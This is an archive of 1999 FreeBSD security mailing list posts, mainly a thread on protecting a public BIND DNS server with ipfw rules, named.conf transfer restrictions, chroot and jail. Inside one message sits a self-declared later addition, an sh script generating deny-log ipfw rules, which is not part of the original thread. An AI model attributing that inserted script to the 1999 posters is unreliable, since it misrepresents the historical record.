:rules I'd be grateful to see them.
:
:Thanks!
:
:Nate

If you are primary for one or more domains the server that serves those
domains should be configured for read-only operation. It should not be
configured as a caching server. If you do that the server will be
reasonably well protected.
You can create allow/deny lists in named.conf, configuration options are well documented in the bind distribution, in your source tree: file:/usr/src/contrib/bind/doc/html/ -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 12:55: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 703B414ED4 for ; Mon, 23 Aug 1999 12:54:57 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 3F2D91C2B; Mon, 23 Aug 1999 14:55:55 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 3A3023826; Mon, 23 Aug 1999 14:55:55 -0400 (EDT) Date: Mon, 23 Aug 1999 14:55:55 -0400 (EDT) From: Bill Fumerola To: Matthew Dillon Cc: Nate Williams , freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <199908231948.MAA10395@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 23 Aug 1999, Matthew Dillon wrote: > You can create allow/deny lists in named.conf, configuration options are > well documented in the bind distribution, in your source tree: He wants to secure the server with firewall rules, not the service, I believe. 
-- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 12:59:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 5CC8515731 for ; Mon, 23 Aug 1999 12:59:20 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id MAA10488; Mon, 23 Aug 1999 12:58:50 -0700 (PDT) (envelope-from dillon) Date: Mon, 23 Aug 1999 12:58:50 -0700 (PDT) From: Matthew Dillon Message-Id: <199908231958.MAA10488@apollo.backplane.com> To: Bill Fumerola Cc: Nate Williams , freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :On Mon, 23 Aug 1999, Matthew Dillon wrote: : :> You can create allow/deny lists in named.conf, configuration options are :> well documented in the bind distribution, in your source tree: : :He wants to secure the server with firewall rules, not the service, I :believe. : :-- :- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - :- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - Simply do not run any other services on the server except, say, sshd. That's what we did at BEST. 
					-Matt
					Matthew Dillon

From owner-freebsd-security Mon Aug 23 13: 2:19 1999
Delivered-To: freebsd-security@freebsd.org
Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 4375414FC9 for ; Mon, 23 Aug 1999 13:02:13 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com)
Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id NAA05013; Mon, 23 Aug 1999 13:01:17 -0700 (PDT)
Message-ID: <19990823130116.B1797@best.com>
Date: Mon, 23 Aug 1999 13:01:16 -0700
From: "Jan B. Koum "
To: Matthew Dillon , Nate Williams
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
References: <199908231935.NAA01122@mt.sri.com> <199908231948.MAA10395@apollo.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <199908231948.MAA10395@apollo.backplane.com>; from Matthew Dillon on Mon, Aug 23, 1999 at 12:48:09PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Aug 23, 1999 at 12:48:09PM -0700, Matthew Dillon wrote:
> :I've got some rules in place, but if someone has gotten DNS firewall
> :rules I'd be grateful to see them.
> :
> :Thanks!
> :
> :Nate
>
>     If you are primary for one or more domains the server that serves those
>     domains should be configured for read-only operation.  It should not be
>     configured as a caching server.  If you do that the server will be
>     reasonably well protected.
>
>     You can create allow/deny lists in named.conf, configuration options are
>     well documented in the bind distribution, in your source tree:
>
>	file:/usr/src/contrib/bind/doc/html/
>
>					-Matt
>					Matthew Dillon
>

One can also run named in chroot() environment and as non-root user.  In
fact, this is exactly what we are doing where I work:

85-jkb(nautilus)% ssh dns1.corp ps ax | grep named
  106  ??  Ss     0:30.01 syslogd -s -l /var/named/dev/log
27897  ??  Ss  1047:54.55 /var/named/named -u bind -g bind -t /var/named

-- yan

From owner-freebsd-security Mon Aug 23 13:12:49 1999
Delivered-To: freebsd-security@freebsd.org
Received: from iaehv.iae.nl (iaehv.IAE.nl [194.151.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 7938A1504B for ; Mon, 23 Aug 1999 13:12:43 -0700 (PDT) (envelope-from wjw@iae.nl)
Received: from wjw (wjw.digiware.nl [212.61.27.68]) by iaehv.iae.nl (Postfix) with SMTP id 2635F20F85; Mon, 23 Aug 1999 22:09:58 +0200 (CEST)
Message-ID: <05d801beeda4$8765ae80$441b3dd4@wjw.digiware.nl>
From: "Willem Jan Withagen"
To: "Ollivier Robert"
Cc:
Subject: Re: getting passwored data via a perl cgi
Date: Mon, 23 Aug 1999 22:17:30 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.2106.4
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I did it the other way around:
I wrote an Apache security module which takes usercode/password and then
verifies it at the POP-port.  If you don't want POP outside the box, use
tcpwrappers or a firewall to hide them.

The advantage is that this code is very unlikely to be stored in a
cache/proxy, whilst I've found plenty of "pages" in many Win'95/OS2 caches
containing usercode/password combinations

--WjW

PS: code is available, but RAW

-----Original Message-----
From: Ollivier Robert
To: freebsd-security@freebsd.org
Date: zondag 22 augustus 1999 23:00
Subject: Re: getting passwored data via a perl cgi

>According to Colin Eric Johnson:
>> Is there a way to allow other users access to complete password database?
>> I understand, basically, why this is restricted but I'm not sure how else
>> to solve this given FreeBSDs restrictions.
>
>Either you make it setuid root or you wipe up a daemon that runs as root and
>make your script discuss with the daemon.  The daemon could cache entries for
>example (although pwd lookups should be fast thanks to the DB files).
>--
>Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr
>FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>
>

From owner-freebsd-security Mon Aug 23 13:12:53 1999
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 408A81505E for ; Mon, 23 Aug 1999 13:12:45 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA11141; Mon, 23 Aug 1999 22:08:18 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: "Jan B. Koum "
Cc: Matthew Dillon , Nate Williams , freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-reply-to: Your message of "Mon, 23 Aug 1999 13:01:16 PDT." <19990823130116.B1797@best.com>
Date: Mon, 23 Aug 1999 22:08:18 +0200
Message-ID: <11139.935438898@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <19990823130116.B1797@best.com>, "Jan B. Koum " writes:
>One can also run named in chroot() environment and as non-root user.  In
>fact, this is exactly what we are doing where I work:
>
>85-jkb(nautilus)% ssh dns1.corp ps ax | grep named
>  106  ??  Ss     0:30.01 syslogd -s -l /var/named/dev/log
>27897  ??  Ss  1047:54.55 /var/named/named -u bind -g bind -t /var/named

Even better yet:  Run it in a jail with its own IP number...

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon Aug 23 13:13: 5 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id BA62F157A2 for ; Mon, 23 Aug 1999 13:12:56 -0700 (PDT) (envelope-from nate@mt.sri.com)
Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id OAA02208; Mon, 23 Aug 1999 14:11:42 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com)
Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id OAA01520; Mon, 23 Aug 1999 14:11:41 -0600
Date: Mon, 23 Aug 1999 14:11:41 -0600
Message-Id: <199908232011.OAA01520@mt.sri.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Poul-Henning Kamp
Cc: "Jan B. Koum " , Matthew Dillon , Nate Williams , freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: <11139.935438898@critter.freebsd.dk>
References: <19990823130116.B1797@best.com> <11139.935438898@critter.freebsd.dk>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@mt.sri.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> >One can also run named in chroot() environment and as non-root user.  In
> >fact, this is exactly what we are doing where I work:
> >
> >85-jkb(nautilus)% ssh dns1.corp ps ax | grep named
> >  106  ??  Ss     0:30.01 syslogd -s -l /var/named/dev/log
> >27897  ??  Ss  1047:54.55 /var/named/named -u bind -g bind -t /var/named
>
> Even better yet:  Run it in a jail with its own IP number...
This box isn't ready for -current, or more to the point, -current isn't
ready for prime-time anytime soon.  :) :) :)

Nate

From owner-freebsd-security Mon Aug 23 13:13:32 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 0919A15734 for ; Mon, 23 Aug 1999 13:13:24 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id NAA36075; Mon, 23 Aug 1999 13:12:55 -0700 (PDT) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <199908232012.NAA36075@gndrsh.dnsmgr.net>
Subject: Re: IPFW/DNS rules
In-Reply-To: <199908231935.NAA01122@mt.sri.com> from Nate Williams at "Aug 23, 1999 01:35:21 pm"
To: nate@mt.sri.com (Nate Williams)
Date: Mon, 23 Aug 1999 13:12:55 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> I have a public DNS server that I need people to be able to query, but
> is there anything I can do to avoid anyone doing anything 'nasty' to it.

Not a whole lot you can do here, other than keep on top of the latest
versions of bind from ISC.

> Also, I need to open up access to it to those hosts that secondary me,
> as well as those I secondary for.

That one is easy, 2 things to do.  First, list those who are secondaries
for zones on this box in the named.conf options {allow-transfer{ip list}};
Second, since xfers are done via TCP, setup rules to allow only your
secondaries to ``setup'' connections to your primary, and allow your
server to ``setup'' connections to the servers it secondaries for.
You should use an option {query-source address X port 53;}; to make
this easier.  Here is a sample snip from named.conf:

options {
	directory "/etc/namedb";
	listen-on port 53 { 127.0.0.1; A.B.C.D; };
	query-source address A.B.C.D port 53;
	allow-transfer { OUTSIDEIP; };
};

> (I also want to make sure that none of my internal hosts 'leak' DNS
> stuff, but that they also all go through the DNS server in order to find
> hosts...)
>
> I've got some rules in place, but if someone has gotten DNS firewall
> rules I'd be grateful to see them.

These rules only log things, they are not meant to stop things, all logs
are carefully investigated (IP's blacked out to protect the parties and
myself, A.B.C.D is the inside DNS, W.X.Y.Z is the outside DNS, the other
400 rules that don't deal with DNS blacked out as well :-)):

ipfw add 10000 allow tcp from any to any established
ipfw add 10530 allow tcp from A.B.C.D to W.X.Y.Z 53 setup
ipfw add 10539 allow log tcp from any to any 53
ipfw add 40530 allow udp from any to A.B.C.D 53
ipfw add 40530 allow udp from A.B.C.D 53 to any
ipfw add 40539 allow log udp from any to any 53
ipfw add 40539 allow log udp from any 53 to any

To make this work for you change ``allow log'' to ``deny'' or ``deny log''.

Also the above rules don't include the inside DNS doing zone transfers
from outside DNS boxes.  Add another 10530 rule:

ipfw add 10530 allow tcp from OUTSIDE to INSIDE 53 setup

Hope that helps...
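An added example, not from Rod's post or any other message in this thread: a POSIX sh script that prints Rod's rule set in the enforcing form he describes (the log-only catch-alls turned into "deny log"), with one TCP setup rule per secondary; A.B.C.D, W.X.Y.Z and the secondary addresses are constructed placeholders. The rules are printed rather than executed so they can be reviewed on any host before being fed to ipfw on the firewall; note Steinar's caveat later in the thread that ordinary resolvers may retry over TCP when a UDP answer is truncated, so refusing all other TCP 53 traffic only fits a primary reached solely by its secondaries.

```sh
#!/bin/sh
# Added example (not from any message in this thread): generate an ipfw rule
# set for a dedicated authoritative DNS server following Rod's layout.
# A.B.C.D (inside DNS), W.X.Y.Z (outside DNS) and the secondaries are
# constructed placeholders; override them via the environment.

INSIDE_DNS="${INSIDE_DNS:-A.B.C.D}"            # the authoritative server being protected
OUTSIDE_DNS="${OUTSIDE_DNS:-W.X.Y.Z}"          # server it pulls zones from (it is secondary for them)
SECONDARIES="${SECONDARIES:-S.S.S.1 S.S.S.2}"  # hosts allowed to pull zone transfers from us

# gen_dns_rules: print the rule set on stdout.  Numbering follows Rod's post
# (105xx for TCP, 405xx for UDP); the two log-only catch-alls become
# "deny log" exactly as he suggested.  Because named is configured with
# "query-source address A.B.C.D port 53", every packet the server sends or
# receives has port 53 on its side, which is what keeps the UDP rules simple.
gen_dns_rules() {
    # Established TCP flows pass; the setup rules below decide who may open one.
    echo "ipfw add 10000 allow tcp from any to any established"
    # Zone transfers our server initiates toward the servers it is secondary for.
    echo "ipfw add 10530 allow tcp from $INSIDE_DNS to $OUTSIDE_DNS 53 setup"
    # Zone transfers pulled by our own secondaries: one rule per secondary.
    for s in $SECONDARIES; do
        echo "ipfw add 10530 allow tcp from $s to $INSIDE_DNS 53 setup"
    done
    # Any other attempt to reach TCP 53, inbound or outbound, is refused and logged.
    echo "ipfw add 10539 deny log tcp from any to any 53"
    # Ordinary UDP queries to our server and its replies (and, thanks to
    # query-source port 53, its own outbound queries and their answers).
    echo "ipfw add 40530 allow udp from any to $INSIDE_DNS 53"
    echo "ipfw add 40530 allow udp from $INSIDE_DNS 53 to any"
    # Internal hosts talking DNS to the outside directly ('leaking'), or
    # outsiders using source port 53 to reach other UDP ports: refused and logged.
    echo "ipfw add 40539 deny log udp from any to any 53"
    echo "ipfw add 40539 deny log udp from any 53 to any"
}

# harden: turn a log-only rule set (as Rod posted it) into an enforcing one,
# the "allow log" -> "deny log" substitution he describes.  Reads stdin.
harden() {
    sed 's/ allow log / deny log /'
}

# count_setup_rules: number of TCP "setup" rules in the generated set
# (one for the outside server plus one per secondary).
count_setup_rules() {
    gen_dns_rules | grep -c ' setup$'
}

# Usage: sh dnsrules.sh --print > /etc/ipfw.dns.rules (review, then apply).
if [ "${1:-}" = "--print" ]; then
    gen_dns_rules
fi
```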
--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Mon Aug 23 13:25: 5 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id 99DC51571E for ; Mon, 23 Aug 1999 13:25:00 -0700 (PDT) (envelope-from nate@mt.sri.com)
Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id OAA02360; Mon, 23 Aug 1999 14:24:04 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com)
Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id OAA01685; Mon, 23 Aug 1999 14:24:01 -0600
Date: Mon, 23 Aug 1999 14:24:01 -0600
Message-Id: <199908232024.OAA01685@mt.sri.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: "Rodney W. Grimes"
Cc: nate@mt.sri.com (Nate Williams), freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: <199908232012.NAA36075@gndrsh.dnsmgr.net>
References: <199908231935.NAA01122@mt.sri.com> <199908232012.NAA36075@gndrsh.dnsmgr.net>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@mt.sri.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > I have a public DNS server that I need people to be able to query, but
> > is there anything I can do to avoid anyone doing anything 'nasty' to it.
>
> Not a whole lot you can do here, other than keep on top of the latest
> versions of bind from ISC.

*sigh*  Guess Bind is really in the same category as sendmail then.
Unfortunately, BIND has its hooks all over the system, including the C
library.  Can I just install the named and not worry about anything
else, leaving the system the same?  The box in question is running
2.2.8, and I *really* don't want to upgrade it if I can avoid it.

(Note, this is a dedicated box w/out any accounts on it, so I don't care
about non-external breakins.  You can't get into it w/out SSH logins
anyway....)

> > Also, I need to open up access to it to those hosts that secondary me,
> > as well as those I secondary for.
>
> That one is easy, 2 things to do.  First, list those who are secondaries
> for zones on this box in the named.conf options {allow-transfer{ip
> list}};

....

> Second since xfers are done via TCP setup rules to allow only your secondaries
> to ``setup'' connections to your primary, and allow your server to
> ``setup'' connections to the servers it secondaries for.

Can I setup firewall rules for this as well?  Do normal queries require
TCP connections?  I'd like to be able to 'shutoff' TCP access to the box
except from my secondaries if at all possible.

Is there anywhere I can find the protocol information aside from using
the source?  Any good BIND books?  (I've got the O'Reilly TCP book, but
it's way out of date and not much help anymore...)

> > (I also want to make sure that none of my internal hosts 'leak' DNS
> > stuff, but that they also all go through the DNS server in order to find
> > hosts...)
> >
> > I've got some rules in place, but if someone has gotten DNS firewall
> > rules I'd be grateful to see them.
>
> These rules only log things, they are not meant to stop things, all logs
> are carefully investigated (IP's blacked out to protect the parties and
> myself, A.B.C.D is the inside DNS, W.X.Y.Z is the outside DNS, the other
> 400 rules that don't deal with DNS blacked out as well :-)):
>
> ipfw add 10000 allow tcp from any to any established
> ipfw add 10530 allow tcp from A.B.C.D to W.X.Y.Z 53 setup

So far so good.  You're limiting your firewall to only connect to a
primary/secondary.

> ipfw add 10539 allow log tcp from any to any 53

This seems insecure to me.  Any external host can connect to port 53 on
your internal hosts.  Also, internal hosts can 'leak' information out
externally.

> ipfw add 40530 allow udp from any to A.B.C.D 53

Fairly secure, as long as BIND on A.B.C.D is secure, which we hafta
assume at some point. :)

> ipfw add 40530 allow udp from A.B.C.D 53 to any
> ipfw add 40539 allow log udp from any to any 53

This is *NOT* secure, just like the TCP port.

> ipfw add 40539 allow log udp from any 53 to any

This is also insecure, in that it allows anyone to use source port 53 to
connect to *any* UDP port in your network.

Am I being paranoid?  You betcha.  A number of machines at work in
another division were compromised recently, including one running a
commercial firewall.  Do I feel safe?  Pretty much, but when things like
this happen, you like to go through your system and crank everything
down a couple more notches. :(

> Also the above rules don't include the inside DNS doing zone transfers
> from outside DNS boxes.  Add another 10530 rule:
> ipfw add 10530 allow tcp from OUTSIDE to INSIDE 53 setup

Yep.

> Hope that helps...

They look like mine except that mine are even more paranoid than yours.
However, I don't like what I have, and was hoping someone could tell me
how to lock things down better.  Any good books on this?
Nate

From owner-freebsd-security Mon Aug 23 13:26:47 1999
Delivered-To: freebsd-security@freebsd.org
Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id 9BDE014CC0 for ; Mon, 23 Aug 1999 13:26:45 -0700 (PDT) (envelope-from freebsd@deepwell.com)
Received: (qmail 3524 invoked from network); 23 Aug 1999 21:10:29 -0000
Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 23 Aug 1999 21:10:29 -0000
Message-Id: <4.2.0.58.19990823131756.01edf5d0@mail1.dcomm.net>
X-Sender: freebsd@mail.deepwell.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Mon, 23 Aug 1999 13:19:17 -0700
To: Poul-Henning Kamp , freebsd-security@freebsd.org
From: Deepwell Internet
Subject: Re: IPFW/DNS rules
In-Reply-To: <11139.935438898@critter.freebsd.dk>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm not familiar with jail as an admin term or a command.  Can you tell me
where I can find more information on this?  Is it an admin philosophy or a
tool?

> >One can also run named in chroot() environment and as non-root user.  In
> >fact, this is exactly what we are doing where I work:
> >
> >85-jkb(nautilus)% ssh dns1.corp ps ax | grep named
> >  106  ??  Ss     0:30.01 syslogd -s -l /var/named/dev/log
> >27897  ??  Ss  1047:54.55 /var/named/named -u bind -g bind -t /var/named
>
>Even better yet:  Run it in a jail with its own IP number...
>

From owner-freebsd-security Mon Aug 23 13:39:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id ECC83151BA for ; Mon, 23 Aug 1999 13:39:18 -0700 (PDT) (envelope-from sthaug@nethelp.no)
Received: (qmail 99209 invoked by uid 1001); 23 Aug 1999 20:37:37 +0000 (GMT)
To: nate@mt.sri.com
Cc: freebsd@gndrsh.dnsmgr.net, freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
From: sthaug@nethelp.no
In-Reply-To: Your message of "Mon, 23 Aug 1999 14:24:01 -0600"
References: <199908232024.OAA01685@mt.sri.com>
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Mon, 23 Aug 1999 22:37:37 +0200
Message-ID: <99207.935440657@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Not a whole lot you can do here, other than keep on top of the latest
> > versions of bind from ISC.
>
> *sigh*  Guess Bind is really in the same category as sendmail then.
> Unfortunately, BIND has its hooks all over the system, including the C
> library.  Can I just install the named and not worry about anything
> else, leaving the system the same?  The box in question is running
> 2.2.8, and I *really* don't want to upgrade it if I can avoid it.

You can install 8.2.1 just fine on a 2.2.8 box.  It's a good idea to get
8.2.1 (or newer - 8.2.2 is now in public beta test) because of security
fixes.  For one thing, 8.2 and newer lets you randomize query id's -
8.1.2 doesn't.

> > Second since xfers are done via TCP setup rules to allow only your secondaries
> > to ``setup'' connections to your primary, and allow your server to
> > ``setup'' connections to the servers it secondaries for.
>
> Can I setup firewall rules for this as well?  Do normal queries require
> TCP connections?  I'd like to be able to 'shutoff' TCP access to the box
> except from my secondaries if at all possible.

That would be a pretty bad idea in general:

- A resolver is *allowed* to use TCP for DNS queries.
- The RFC specifies that a resolver *should* retry using TCP if a UDP
  answer is too big (and thus gets the TC, Truncated, bit set).

Of course, for a primary which is behind a firewall, and only supposed to
be accessed from the secondaries, the situation is different.

For general DNS info, try http://www.dns.net/dnsrd/.  The best book is
the O'Reilly "DNS and BIND" book by Albitz and Liu.  Make sure you get
the newest edition.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon Aug 23 13:39:46 1999
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id C46DD14CC0 for ; Mon, 23 Aug 1999 13:39:34 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id QAA22922; Mon, 23 Aug 1999 16:38:23 -0400 (EDT) (envelope-from wollman)
Date: Mon, 23 Aug 1999 16:38:23 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199908232038.QAA22922@khavrinen.lcs.mit.edu>
To: Warner Losh
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
In-Reply-To: <199908231835.MAA40614@harmony.village.org>
References: <4726.935379766@localhost> <199908231835.MAA40614@harmony.village.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

> InSecureBSD?  I don't think so.  FreeBSD takes security very
> seriously...  I think that since we're based in the bay area that
> export of crypto is completely legal.

Well, yes and no.  You would do well to read the decision of the Appeals
Court.
The judges ruled that export controls on crypto SOURCE CODE were
unconstitutional.  They chose not to decide the question of whether
export controls on binaries were also unconstitutional, although the way
the decision was drawn suggests that the appeals court would decide the
other way on that question if such a controversy arose.  They found the
district court's rationale unconvincing, and decided the case on the
basis of a different legal theory.

This is now good law in the Ninth Circuit.  I do not believe the
question has reached a similar level in any of the other circuits, so
there may not be a national rule for some time.  (I don't know if the
government has yet appealed the Ninth Circuit's decision.  If I were the
government, I probably would not appeal this decision and instead wait
for a case in another circuit where the facts were a bit more
conducive.)

At any rate, for those of us who do not live on the West Coast, export
controls remain a fact of life.

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Mon Aug 23 13:44:19 1999
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 0A33B1514B for ; Mon, 23 Aug 1999 13:44:14 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA11318; Mon, 23 Aug 1999 22:42:32 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Deepwell Internet
Cc: freebsd-security@freebsd.org
Subject: Re: IPFW/DNS rules
In-reply-to: Your message of "Mon, 23 Aug 1999 13:19:17 PDT." <4.2.0.58.19990823131756.01edf5d0@mail1.dcomm.net>
Date: Mon, 23 Aug 1999 22:42:32 +0200
Message-ID: <11316.935440952@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

check on a current system:

	man jail

In message <4.2.0.58.19990823131756.01edf5d0@mail1.dcomm.net>, Deepwell Internet writes:
>I'm not familiar with jail as an admin term or a command.  Can you tell me
>where I can find more information on this?  Is it an admin philosophy or a
>tool?
>
>
>
>
>> >One can also run named in chroot() environment and as non-root user.  In
>> >fact, this is exactly what we are doing where I work:
>> >
>> >85-jkb(nautilus)% ssh dns1.corp ps ax | grep named
>> >  106  ??  Ss     0:30.01 syslogd -s -l /var/named/dev/log
>> >27897  ??  Ss  1047:54.55 /var/named/named -u bind -g bind -t /var/named
>>
>>Even better yet:  Run it in a jail with its own IP number...
>>
>
>

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon Aug 23 13:50:52 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rapidnet.com (rapidnet.com [205.164.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 3911214E4F for ; Mon, 23 Aug 1999 13:50:49 -0700 (PDT) (envelope-from nick@rapidnet.com)
Received: from localhost (nick@localhost) by rapidnet.com (8.9.3/8.9.3) with ESMTP id OAA88696; Mon, 23 Aug 1999 14:48:47 -0600 (MDT)
Date: Mon, 23 Aug 1999 14:48:47 -0600 (MDT)
From: Nick Rogness
To: Nate Williams
Cc: "Rodney W. Grimes" , freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
In-Reply-To: <199908232024.OAA01685@mt.sri.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 23 Aug 1999, Nate Williams wrote:

> >
> > Not a whole lot you can do here, other than keep on top of the latest
> > versions of bind from ISC.

	This is true.  Even with blocking xfer-nets your DNS server can still
